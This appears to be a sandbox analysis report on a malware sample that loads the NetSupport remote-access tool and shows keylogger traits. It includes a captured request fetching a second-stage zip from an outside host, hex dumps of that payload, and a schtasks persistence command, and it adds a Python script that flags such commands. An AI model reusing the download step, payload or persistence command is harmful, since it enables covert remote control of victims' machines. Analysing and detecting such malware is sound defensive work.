1f 00 14 00 00
                                                                                                          Data Ascii: PCICHEK.DLL a[7\5PK$VdX$ aremcmdstub.exe *2j[7\5PK8Wu:}$ dclient32.ini 0$j#[7nrPK


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49857 | 23.254.224.41 | 443 | 2972 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 07:58:33 UTC | 55 | OUT | GET /dwnld/2nd2_4.zip HTTP/1.1
Host: cycleconf.com
2024-12-10 07:58:33 UTC | 263 | IN | HTTP/1.1 200 OK
Date: Tue, 10 Dec 2024 07:58:33 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Last-Modified: Wed, 24 Jul 2024 21:12:34 GMT
Accept-Ranges: bytes
Content-Length: 787082
Vary: Accept-Encoding
Content-Type: application/zip
                                                                                                          2024-12-10 07:58:33 UTC7929INData Raw: 50 4b 03 04 14 00 00 00 08 00 2c 61 87 4f 09 a5 f9 52 62 03 00 00 00 0a 00 00 0a 00 00 00 6e 65 74 6d 73 67 2e 64 6c 6c ed 56 4d 48 54 51 14 fe de cc 18 8d 7f 18 44 d1 aa 27 18 d5 a2 c1 89 0a 83 50 33 15 14 ff 50 b3 08 a1 5e 33 af 71 c2 79 33 bd 37 96 1a c8 04 12 41 06 d6 22 5a 56 bb 16 d5 2c 5a 68 10 b4 6c 63 8b 56 15 51 d1 a2 5d b5 6d 11 d6 77 cf dc 19 5f a3 22 41 bb 3a 8f 73 7f be 7b fe ee 39 f7 bd fb 7a 4f cd 23 08 20 44 fe f9 13 58 40 81 5a b1 31 29 d9 da 9d 4f 6b f1 24 bc 54 bf 60 f4 2c d5 0f 8f 25 3d 33 e3 a6 13 ae 95 32 63 96 e3 a4 b3 e6 59 db 74 27 1c 33 e9 98 ed fd 43 66 2a 1d b7 23 35 35 95 0d da c6 c1 2b 47 3e 5c f8 38 38 57 64 fb fa c3 b9 8c f4 03 37 54 3f 98 8c 8d 29 bc dc f7 40 07 d0 63 04 f0 f8 71 df 93 22 f6 11 81 fa 2a a3 76 ab 4c 36 fb
                                                                                                          Data Ascii: PK,aORbnetmsg.dllVMHTQD'P3P^3qy37A"ZV,ZhlcVQ]mw_"A:s{9zO# DX@Z1)Ok$T`,%=32cYt'3Cf*#55+G>\88Wd7T?)@cq"*vL6
                                                                                                          2024-12-10 07:58:33 UTC8000INData Raw: 29 26 9d 8f b0 e0 73 a5 31 b7 d2 58 be 0c aa fb 33 15 dd 2c 44 77 ec ae 01 aa fb 73 2d d3 7f bd 4b ae 2e 9f 6c bf 8a 13 2a ec 93 6b bc 4d 5b f8 09 56 58 69 c3 df a8 b9 7e 64 e1 3e 39 b7 d4 1a 35 4e 74 b8 cc 95 a3 fd bf 55 21 dc 08 71 fb 5d 89 ad fc 3b 6d 2b 8f 91 8b 17 9a 45 6f 66 b1 c7 70 a4 88 74 a3 a9 93 59 c2 2c ec 1e 65 cc 9c fd 41 cb d9 f1 3b e5 6a 99 39 a5 3e 29 aa f3 17 6d a1 df dd a9 a9 ce 5f b5 d5 11 58 ae 00 f2 ee df 21 53 e3 4f ea 10 0b ef 4c ec 10 af 69 3b c4 14 96 d9 cf f5 48 9a 27 1a 54 1e c5 58 8e 0b b7 b7 f0 6e 71 1f 79 04 f7 43 5d a1 e8 ae 3c 5a 14 7a 48 79 19 28 cc 4e 95 fe 0a a4 ff 87 bc 44 bd ef af ec 7b b4 b2 fa 6e 5e 12 bb aa 61 61 6a b6 4f 0b be 98 81 27 ee 37 5f df 79 40 af d9 5f 8c 34 5d 66 fb 21 f0 c2 d6 4d 15 97 f0 8e 5d 6b be
                                                                                                          Data Ascii: )&s1X3,Dws-K.l*kM[VXi~d>95NtU!q];m+EofptY,eA;j9>)m_X!SOLi;H'TXnqyC]<ZzHy(ND{n^aajO'7_y@_4]f!M]k
                                                                                                          2024-12-10 07:58:33 UTC8000INData Raw: d5 6e 7b e3 b9 3f 96 97 b6 a4 e8 af 9a fa d2 6e 9b a2 f3 f6 ef 0f 79 5f a6 e8 0f 25 7c d2 ac 42 1c 9a 80 6f 08 4c a5 8b 98 1c 8d 5c 72 fb 6f 4e 6e ff ff 8b f6 a0 f6 2b 1d a7 11 fd ed e1 95 e4 f3 ef d8 4b 0f ee 0f 15 87 c8 cc 0a 6a 5d d5 7c ab 61 40 10 f6 7b 61 c5 e2 3b e2 3d 3c ea be 05 d9 ca 69 72 c4 1e 1f ca 86 fa 9b 66 18 39 b1 e9 20 09 f7 f0 8f 9b e8 af 48 39 7a 1e b7 be 8c a0 39 07 1c bb 57 99 04 40 dc e3 15 1f 37 37 7d a6 8f 1a 73 85 50 8f 1c 8f 07 21 5c 9f 87 dd c5 f2 03 3c 51 68 68 34 34 c2 f8 c7 6e 7a 16 70 39 c0 52 8d 07 27 c5 7b 8c e2 7c 1e 73 0d dd 86 ee 68 e6 f0 9c 66 03 b4 40 1f 68 33 2d 52 04 af 8a 70 d7 ea dc 1b f4 9c c1 79 1e e0 f1 f2 91 b5 3d ab 66 37 5d d6 8b 6f 1b 0e 19 0e 15 79 dc e2 05 a1 e4 3c 99 00 30 e2 01 03 bd 09 3b 27 d4 13 1c
                                                                                                          Data Ascii: n{?ny_%|BoL\roNn+Kj]|a@{a;=<irf9 H9z9W@77}sP!\<Qhh44nzp9R'{|shf@h3-Rpy=f7]oy<0;'
                                                                                                          2024-12-10 07:58:33 UTC8000INData Raw: 3c 78 45 af 9d 2a 36 9d 4f d6 cd a6 84 55 1c 46 7b b6 54 d4 c7 01 ff 35 e9 fb 88 4f 87 a6 ef cc 72 8a 72 99 8b 0d 40 70 c9 e7 74 7d 14 1b 41 27 e2 10 e8 5b dc e5 92 ff d9 1d 5b 1f 6f 09 ef 92 79 b8 fb cd 83 8d 10 7e 1a c3 f3 90 ae ab 96 24 51 7e 38 1d 96 4c 0c 5f e2 e4 31 0e d0 65 84 79 0f 0c 67 a1 35 44 9b d1 cd e6 9f 99 51 f4 3a a4 e2 6c f9 3b 60 b6 a6 b3 da 73 02 63 dc 16 85 cd 3f dc 5f b1 73 1d 59 6d 76 f7 4f 3b 1a 8b 17 f6 1f f4 4f 82 f9 7b 98 0f 76 df 54 bc 6e 5a 8e 37 97 7b 54 2f ec 98 48 b7 69 f8 a3 de 51 96 1a d5 bd fc a5 42 90 8d dd 4d 37 c0 89 a1 8e 80 09 d4 86 6e c1 08 32 b4 c3 a9 a4 60 2a 10 22 97 5b 69 0b 86 0d d5 ca 26 9a 77 e5 09 ac 4e 85 75 c0 bd 2e 1b af 42 21 b7 50 c8 2c 0c dc c9 cb 56 f4 dc 6e c0 eb 32 58 8f 7e bd 3c b9 5f 12 5c 28 f0
                                                                                                          Data Ascii: <xE*6OUF{T5Orr@pt}A'[[oy~$Q~8L_1eyg5DQ:l;`sc?_sYmvO;O{vTnZ7{T/HiQBM7n2`*"[i&wNu.B!P,Vn2X~<_\(
                                                                                                          2024-12-10 07:58:33 UTC8000INData Raw: 98 f1 e0 99 c0 3c 06 1f 82 35 8e ac dc 59 9c c7 1a 16 52 0a 28 4c 9f 61 05 14 b0 f1 2a 60 a3 c9 fd 3b 73 8f 89 26 06 dc 74 04 6e 3a 00 97 dc 57 7d 08 28 03 23 1a 95 cf 96 e5 4d 84 b5 27 8c f1 41 1e f9 9d 43 c8 41 e8 53 70 b6 33 23 14 36 a7 38 11 f6 7f c6 a8 c4 eb 79 2d 69 4e 90 f7 75 c6 cb fb 8e 26 0d 29 ef 83 d5 1d 00 6b 69 8b e2 e1 dd 92 34 17 62 16 6c 59 01 cf e7 97 7f 89 e2 2f fa 94 6f a6 bc 97 58 d1 2b 1e 98 0a 69 07 0a f0 e9 c3 e7 32 7c 0a 20 6d b8 24 5c ab f2 b5 f3 85 dc a6 60 64 f9 ca 91 bc ef a1 2b 74 dc 2f 15 b1 23 7b 7e 03 e3 af 5c 82 53 39 43 39 8c 11 be e5 2d 51 36 8c 92 b4 67 e9 70 35 80 58 cc 3b 7c ce ed 48 9f 6a e7 e4 aa d7 ed e5 c3 c2 73 50 03 8f d4 01 94 92 34 99 3e b7 c3 68 90 7b 17 3b 18 e8 4a 1b bb d1 63 6f f2 d4 29 70 c4 c4 dc 75 33
                                                                                                          Data Ascii: <5YR(La*`;s&tn:W}(#M'ACASp3#68y-iNu&)ki4blY/oX+i2| m$\`d+t/#{~\S9C9-Q6gp5X;|HjsP4>h{;Jco)pu3
                                                                                                          2024-12-10 07:58:33 UTC8000INData Raw: 7f b8 b4 50 75 69 b4 07 66 75 23 ce aa 65 1f b6 18 97 eb b8 9a 2b a4 54 9a c3 e8 4d 07 27 08 fb 1a c6 39 d6 45 ef 9c 82 15 59 74 64 79 ae 66 33 76 8a 57 3b f5 74 9c 2b 8f 51 04 f1 ad 6a 06 09 a4 56 ad 4e 32 08 c2 a0 f1 1c 28 b3 16 82 b1 02 a7 1b c1 cb b7 06 ac 96 1e a9 62 17 79 35 78 75 6c 79 ca be b1 30 78 9f 56 7c 83 30 57 52 7b 33 ee 48 90 c2 13 2c aa c9 e2 5f 01 02 e3 e2 7d 2b 60 ec 7e 6e 86 0f f1 8e 2a 3e 2d 1e 20 5d 88 bb 5f 8e f7 60 50 61 06 8f d9 1d 94 93 0b 9d 04 09 39 5c 53 71 35 ad c0 49 96 65 73 35 20 2b 15 4b 7b 67 94 3d 11 b8 dd e5 f2 eb a5 e2 d5 0e 37 fa df b3 9c c0 63 38 f7 9b 43 e4 90 68 43 ab fe d3 b4 54 8b fd 09 fd 85 7f d2 1f 33 ca 9e e4 42 c0 6f 60 b1 ca 1f 7b dc f2 7c 28 76 44 2d 06 16 ad ac d8 6f 40 bb 7f ef 38 6e af 7d 75 d3 bb c6
                                                                                                          Data Ascii: Puifu#e+TM'9EYtdyf3vW;t+QjVN2(by5xuly0xV|0WR{3H,_}+`~n*>- ]_`Pa9\Sq5Ies5 +K{g=7c8ChCT3Bo`{|(vD-o@8n}u
                                                                                                          2024-12-10 07:58:33 UTC8000INData Raw: 0a 48 b7 96 7b 5a 6c 09 41 ee d5 5f 24 2c 21 15 90 8b 5a ee e9 b1 25 04 b9 ef 8f 07 64 b2 0a 48 44 cb 7c 57 6c 09 41 e6 89 09 80 98 55 40 7a b5 dc 77 47 73 1b 20 f7 27 17 e3 01 31 ab 4b 28 ba e0 66 24 2e b8 a6 8b 71 80 b4 ab 08 13 5d 14 79 89 8b 62 e3 c5 78 40 7a 87 31 40 58 e8 06 50 de 8e e6 ee 86 ed ce 9b 00 88 3c 8c 01 92 ad e5 b6 46 73 9f 85 dc 33 e2 01 61 27 f3 d3 db 73 b4 cc b3 62 80 40 e6 11 09 80 1c 66 80 a8 0d ed 81 86 b6 4f 7a 13 69 ff 64 d8 9f 30 79 c7 30 ac 52 5b 75 50 64 bb 01 33 69 e4 17 cb 19 59 39 53 b4 dc ea 94 f8 72 ab b1 9c 39 be dc 32 2c 97 c1 ca 65 bd 09 f6 38 65 cd 58 d6 1b c4 b5 a2 e3 42 3f 85 38 40 8b 86 c5 6d 47 c2 a8 17 f4 10 c3 59 cc 84 2c 17 56 d0 0c 0d 21 da c9 b2 e6 a8 7f a5 60 e3 b0 5f 06 df 1d 96 7c a8 29 92 0c c7 1f 5e 4c
                                                                                                          Data Ascii: H{ZlA_$,!Z%dHD|WlAU@zwGs '1K(f$.q]ybx@z1@XP<Fs3a'sb@fOzid0y0R[uPd3iY9Sr92,e8eXB?8@mGY,V!`_|)^L
                                                                                                          2024-12-10 07:58:33 UTC8000INData Raw: 20 66 51 54 9f da 20 68 77 e1 79 78 bb 01 1e 46 78 98 e0 61 86 47 c6 65 f0 f2 91 75 19 e2 03 76 c5 24 65 93 50 df 21 0f 97 85 30 4e 5b 03 2e f9 4a 67 34 8f f0 ce 3a fb 03 96 13 2d a9 86 5a bb de fa 26 c4 94 49 82 00 b6 fb d8 a6 5e 4c 49 76 06 69 cf 7d 03 e4 58 61 7b da 39 0a 94 f5 15 e1 ba dc a6 14 f8 29 da 47 c3 7a 7f 91 d9 81 97 19 69 81 b1 f4 54 9e 65 39 12 ac 30 dd 25 66 c2 d1 9d 7b ae 49 2c 31 4a 0b 86 eb c5 22 73 5e 66 36 5e a1 bd 07 12 4b f5 3e 4b 5b ad 5c e8 9f 5f 11 2a 03 62 5f 29 01 3b 45 ab 02 4a 86 ac 36 33 f7 0c b8 17 72 cb 1f 3d a4 09 b7 26 b1 fa 34 32 90 a9 c5 d0 70 cb 47 b4 3c c2 bb 78 a1 4a 4a 4c db 50 2a f5 e6 84 13 d5 ef 9e 7f 53 51 aa 0f 21 5b a5 ba 73 0f 2a fa c0 84 60 fe b4 ab 40 44 6e a3 0b 37 f9 55 ae fe f8 4b 48 a4 4b 32 e0 e2 3b
                                                                                                          Data Ascii: fQT hwyxFxaGeuv$eP!0N[.Jg4:-Z&I^LIvi}Xa{9)GziTe90%f{I,1J"s^f6^K>K[\_*b_);EJ63r=&42pG<xJJLP*SQ![s*`@Dn7UKHK2;
                                                                                                          2024-12-10 07:58:33 UTC8000INData Raw: 04 3c 3a aa 59 be 54 c6 9a 5b e9 bf 53 f4 df bb ca 00 7d 9d ea ae f5 89 fb 01 44 ec 74 5b 7a c4 c0 2e 6b 8b 70 43 de 74 08 e4 29 8c 07 b7 c0 6e b7 d2 06 5a 36 d7 31 bd 9a fc 79 94 8f 13 46 c3 dd 08 d3 58 fd f8 39 cd 44 66 97 cb 29 7f 0e d4 bf 1d 82 07 d8 76 f1 2e b7 58 ba 5b c9 34 bd c9 f6 9a d1 4b 46 68 6a ae fb d4 42 1e f2 aa b5 e5 b1 59 74 15 d2 71 8b fa bb 1d 75 e9 10 e8 8e 0b 63 e9 5f d0 91 1a 99 f7 c4 e2 c0 f0 bc 07 16 70 35 10 39 c0 5e dd 04 1e f2 ac dd 2b 5f 27 a5 bb 83 af 29 2e 79 0f 65 38 82 af 82 94 d8 7a 95 ab f9 17 9a 2d f0 f4 3f d1 b6 51 b4 6d 12 6d 9b 45 db 56 d1 b6 43 0d d1 5d 28 95 ec f1 eb 9c 34 41 6e 7c 8e 79 fa aa c8 d0 49 81 3d 81 64 29 70 4a 2c 33 8b 65 26 b1 2c 4b 2c cb 16 cb 8c 10 98 09 05 c3 61 3b b8 d3 d7 85 ed 86 9c 6d c3 74 72
                                                                                                          Data Ascii: <:YT[S}Dt[z.kpCt)nZ61yFX9Df)v.X[4KFhjBYtquc_p59^+_').ye8z-?QmmEVC](4An|yI=d)pJ,3e&,K,a;mtr
                                                                                                          2024-12-10 07:58:34 UTC8000INData Raw: b5 98 a0 88 64 96 e7 c4 bb 35 40 db 2e 63 6b 9f 81 44 f7 d5 2d 66 07 0f 7e 2d 7a 08 95 7a 5e 09 a4 c4 2a d4 76 a0 55 5e cb 76 b1 10 6e a7 85 f0 c9 17 09 ea 58 2e d4 b3 19 eb 61 4f be 8e b5 c2 2f 96 e8 65 6b b1 57 5e ba 7e 13 a2 c1 08 d4 5d 2c 36 d4 af 20 4a 0c df 8f 6a bd 18 9e 2f ee 2e c4 61 c0 06 ec 6c 81 08 38 b1 0f 46 e4 d9 4a da 1a 4f 81 81 59 2c 8a 61 ef b1 e6 f4 83 3d 97 be 43 41 cc c3 0e c4 5c 8e 86 1e 32 6a e7 58 73 e0 23 c2 9a eb db 6c ec bb e3 2f a1 1e bf 9d 35 1c 7f b1 c7 37 69 49 fa ae 85 59 26 37 ff d1 bd 51 85 29 f3 52 36 72 dd bb 63 81 7b f7 9e 43 cf 2c b6 fe fa d8 78 7b 04 b7 1c fe c6 a0 84 a8 a7 3f eb a0 55 d0 82 6d 0e d1 33 33 68 28 1e 6d 07 6e 8f e8 2c 12 5f d8 87 7d d0 0b 68 d6 db 98 af 10 06 1e 8b 21 f4 f2 f6 42 2f 9d a2 35 2a d6 31
                                                                                                          Data Ascii: d5@.ckD-f~-zz^*vU^vnX.aO/ekW^~],6 Jj/.al8FJOY,a=CA\2jXs#l/57iIY&7Q)R6rc{C,x{?Um33h(mn,_}h!B/5*1


                                                                                                          Target ID:0
                                                                                                          Start time:02:57:10
                                                                                                          Start date:10/12/2024
                                                                                                          Path:C:\Users\user\Desktop\Jjv9ha2GKn.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\Jjv9ha2GKn.exe"
                                                                                                          Imagebase:0x750000
                                                                                                          File size:1'128'960 bytes
                                                                                                          MD5 hash:AEDF7F67CF6D7F8EF348BA681046FE51
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2759945326.00000000051E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2751641971.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:4
                                                                                                          Start time:02:57:48
                                                                                                          Start date:10/12/2024
                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                                          Imagebase:0xa00000
                                                                                                          File size:43'008 bytes
                                                                                                          MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:true

                                                                                                          Target ID:6
                                                                                                          Start time:02:58:34
                                                                                                          Start date:10/12/2024
                                                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /tn "DNScache" /tr "C:\Users\user\AppData\Local\DNScache\client32.exe" /RL HIGHEST
                                                                                                          Imagebase:0x470000
                                                                                                          File size:187'904 bytes
                                                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true
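
The schtasks.exe invocation recorded for Target ID 6 registers client32.exe from the user's AppData\Local\DNScache directory as an ONLOGON task with /RL HIGHEST; that task is what brings the NetSupport client (Target IDs 7 and 9) back after a reboot. The Python below is an added example, not part of the Joe Sandbox report, showing how a triage script can score such command lines. SAMPLE_CMDLINE is copied from the Target ID 6 "Commandline" field; the benign contrast line, the list of user-writable directories, the look-alike task names and the two-indicator threshold are this example's own assumptions.

```python
"""Triage schtasks.exe command lines for persistence indicators.

Added example, not part of the Joe Sandbox report. SAMPLE_CMDLINE is the
command line recorded for Target ID 6; BENIGN_CMDLINE, the directory list,
the look-alike names and the "two reasons" threshold are this example's own
assumptions.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Union

# Copied from the report's Target ID 6 "Commandline" field.
SAMPLE_CMDLINE = (
    '"C:\\Windows\\system32\\schtasks.exe" /create /sc ONLOGON /tn "DNScache" '
    '/tr "C:\\Users\\user\\AppData\\Local\\DNScache\\client32.exe" /RL HIGHEST'
)
# Constructed contrast case (assumption: an ordinary admin-installed task).
BENIGN_CMDLINE = (
    'schtasks.exe /create /sc DAILY /st 02:00 /tn "NightlyBackup" '
    '/tr "C:\\Program Files\\Backup\\backup.exe"'
)

# Path fragments a standard user can write to (assumption, not exhaustive).
USER_WRITABLE = ("\\appdata\\local\\", "\\appdata\\roaming\\", "\\temp\\",
                 "\\programdata\\", "\\users\\public\\")
BOOT_TRIGGERS = ("onlogon", "onstart")
# Task names that imitate Windows components (assumption, for illustration).
LOOKALIKE_NAMES = ("dnscache", "svchost", "windowsupdate", "onedrive")


@dataclass
class TaskFinding:
    task_name: str
    schedule: str
    action: str
    run_level: str
    reasons: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # Threshold is an assumption: one indicator alone is common in benign tasks.
        return len(self.reasons) >= 2


def parse_schtasks(cmdline: str) -> Dict[str, Union[str, bool]]:
    """Map each /switch (lower-cased, no slash) to its value, or True if it takes none."""
    # Quoted strings are one token; everything else splits on whitespace.
    tokens = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]
    switches: Dict[str, Union[str, bool]] = {}
    i = 1  # tokens[0] is the schtasks.exe path itself
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("/"):
            name = tok[1:].lower()
            has_value = i + 1 < len(tokens) and not tokens[i + 1].startswith("/")
            switches[name] = tokens[i + 1] if has_value else True
            i += 2 if has_value else 1
        else:
            i += 1
    return switches


def triage(cmdline: str) -> Optional[TaskFinding]:
    """Score a task-creation command line; returns None for non-/create invocations."""
    sw = parse_schtasks(cmdline)
    if "create" not in sw:
        return None
    finding = TaskFinding(
        task_name=str(sw.get("tn", "")),
        schedule=str(sw.get("sc", "")).upper(),
        action=str(sw.get("tr", "")),
        run_level=str(sw.get("rl", "LIMITED")).upper(),  # LIMITED is schtasks' default
    )
    action_lc = finding.action.lower()
    if finding.schedule.lower() in BOOT_TRIGGERS:
        finding.reasons.append("fires at logon/boot, so it survives a reboot")
    if any(frag in action_lc for frag in USER_WRITABLE):
        finding.reasons.append("action binary lives in a user-writable directory")
    if finding.run_level == "HIGHEST":
        finding.reasons.append("requests /RL HIGHEST (runs with the elevated token)")
    if finding.task_name.lower().replace(" ", "") in LOOKALIKE_NAMES:
        finding.reasons.append("task name imitates a Windows component")
    return finding


if __name__ == "__main__":
    for line in (SAMPLE_CMDLINE, BENIGN_CMDLINE):
        f = triage(line)
        print(f"{f.task_name!r}: suspicious={f.suspicious}; " + "; ".join(f.reasons))
```

Run against the report's command line the script returns all four indicators; the same parser can be pointed at Sysmon process-creation events or a schtasks /query export, with the thresholds tuned to the environment.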

                                                                                                          Target ID:7
                                                                                                          Start time:02:58:34
                                                                                                          Start date:10/12/2024
                                                                                                          Path:C:\Users\user\AppData\Local\DNScache\client32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Users\user\AppData\Local\DNScache\client32.exe
                                                                                                          Imagebase:0x400000
                                                                                                          File size:55'456 bytes
                                                                                                          MD5 hash:9497AECE91E1CCC495CA26AE284600B9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.3301652835.00000000004D1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.3304754604.000000006CD80000.00000002.00000001.01000000.00000012.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\DNScache\client32.exe, Author: Joe Security
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 21%, ReversingLabs
                                                                                                          Reputation:moderate
                                                                                                          Has exited:false

                                                                                                          Target ID:8
                                                                                                          Start time:02:58:34
                                                                                                          Start date:10/12/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:9
                                                                                                          Start time:02:58:35
                                                                                                          Start date:10/12/2024
                                                                                                          Path:C:\Users\user\AppData\Local\DNScache\client32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Users\user\AppData\Local\DNScache\client32.exe
                                                                                                          Imagebase:0x400000
                                                                                                          File size:55'456 bytes
                                                                                                          MD5 hash:9497AECE91E1CCC495CA26AE284600B9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.2889855835.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.2889815261.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.2889815261.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                          Reputation:moderate
                                                                                                          Has exited:true


                                                                                                            Execution Graph

                                                                                                            Execution Coverage:20.8%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:3.4%
                                                                                                            Total number of Nodes:473
                                                                                                            Total number of Limit Nodes:15
execution_graph (473 nodes, 15 limit nodes; the node-and-edge listing behind the rendered graph is not reproduced). Root nodes and the API calls they reach:
• a904c8 → CloseHandle (a906a8)
• 75dded8 → ResumeThread (75ddf18)
• 75dc858 → Wow64GetThreadContext (75dc89d)
• 75de0f8 → 75d5888 → PostMessageW (75de378)
• 5b986b0 → GetModuleHandleW (5b989e0)
• 5bc67d0 → CreateWindowExW (5b95d89 / 5b90230)
• 75dd9d0 → VirtualProtectEx (75dda18)
• 75ddc70 → Wow64SetThreadContext (75ddcb5)
• 7199e08 → VirtualProtect (719af0f; and 75d36d0 via 75d172b, 75d18dd, 75d19e1, 75d1a40, 75d21d7, 75d222c, 75d23bd, 75d2e65, 75d3167)
• 5b90448 → 5b900e0 → 5b901d0 → 5b90200 → CreateWindowExW (5b90230)
• 5b913ca → 7b326e8 / 7b326f8 → 7b39640 / 7b39650 → 7b3979c / 7b397c8 → 7b39ea8 / 7b39eb8 → 7b30fa0 → DeleteFileW (7b3a218)
• abd01c → 26ffdb8 → 5bc0006 / 5bc0040 / 5bc00e9 / 5bc010c → 5bc00f8 → 5bc1532 → 5bc1550 / 5bc1560 → CallWindowProcW (5bc15fa)
• 5b9aa40 → 5b9aff8 / 5b9b028 → 5b99520 → DuplicateHandle (5b9b090)
• 75dcf40 → VirtualAllocEx (75dcf80)
• 75d5f00 → 75d8918 → 75daca0 → CreateProcessAsUserW (75dad1f)
• 75dd280 → WriteProcessMemory (75dd2c8)
• 7af19b0 → 39 sibling nodes (7af1cf5 … 7af1dc8) → CreateWindowExW (5b95d89 / 5b90230), continuing 5b9a769 / 5b9a778 → 5b9a922 / 5b9a928 → 5b99480 → 5b9ac84 → 5b9d038 / 5b9d050 → 5b9e177 / 5b9e188 → 5b9f05a / 5b9f060 → 5b9d3f8 → CreateWindowExW (5b9f0b0)
Strings
Memory Dump Source
• Source File: 00000000.00000002.2751306084.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_26f0000_Jjv9ha2GKn.jbxd
Similarity
• API ID:
• String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
• API String ID: 0-99275883
• Opcode ID: 8c5f98ccddf9c6cf7b69085e8180b9ac15fa6aff1ebebded404bbb3b5f834b0f
• Instruction ID: dc0aaf9252f5edf95f07aac85aff1d82c9d6098447e715d4de91c716032c0283
• Opcode Fuzzy Hash: 8c5f98ccddf9c6cf7b69085e8180b9ac15fa6aff1ebebded404bbb3b5f834b0f
• Instruction Fuzzy Hash: A2823731A012099FCF55CF68C984AAEBBF2FF89314F158599E6099B2A5D730ED81CB50

Control-flow Graph (node graph omitted; legend: Executed / Not Executed)

Strings
Memory Dump Source
• Source File: 00000000.00000002.2762051972.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7af0000_Jjv9ha2GKn.jbxd
Similarity
• API ID:
• String ID: (aq$Haq$Haq$Haq$Haq$Haq$Haq$PH]q
• API String ID: 0-1363861295
• Opcode ID: e6c60691020f5e31e8115ac68b163e6f3146d262b1012b19cb1fae24103561c7
• Instruction ID: 1bf79bc23b38cb0f878c2ebe1b9f50ec55840e14ca7536d9742080969279c39f
• Opcode Fuzzy Hash: e6c60691020f5e31e8115ac68b163e6f3146d262b1012b19cb1fae24103561c7
• Instruction Fuzzy Hash: FB62EF717042158FCB08EB78C8946AE7BA7AFC9710F2485A9E51ADB3A5CF34DC06C791

Strings
Memory Dump Source
